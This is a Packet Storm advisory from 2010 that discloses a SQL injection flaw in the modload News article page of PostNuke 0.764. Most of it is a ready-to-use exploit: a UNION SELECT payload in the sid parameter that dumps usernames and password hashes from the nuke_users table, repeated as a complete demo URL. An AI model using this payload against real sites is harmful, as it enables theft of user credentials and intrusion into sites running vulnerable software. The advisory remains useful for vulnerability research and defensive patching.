PostNuke 0.764 Modload SQL Injection

2010-04-27T00:00:00
ID PACKETSTORM:88890
Type packetstorm
Reporter BILGE_KAGAN
Modified 2010-04-27T00:00:00

Description

                                        
                                            `PostNuke 0.764 Module modload SQL Injection Vulnerability  
  
###########################   
  
Author : BILGE_KAGAN  
  
Homepage : http://www.1923turk.com   
  
Script : postnuke http://www.postnuke.com  
  
Download : http://www.postnuke.com/module-Content-view-pid-2.html   
  
###########################   
  
[ Vulnerable File ]  
  
  
modules.php?op=modload&name=News&file=article&sid=[ SQL ]   
  
  
[ XpL ]  
  
  
1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users--  
  
[ Demo]  
  
  
http://[site]/modules.php?op=modload&name=News&file=article&sid=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users--  
  
  
  
  
  
  
`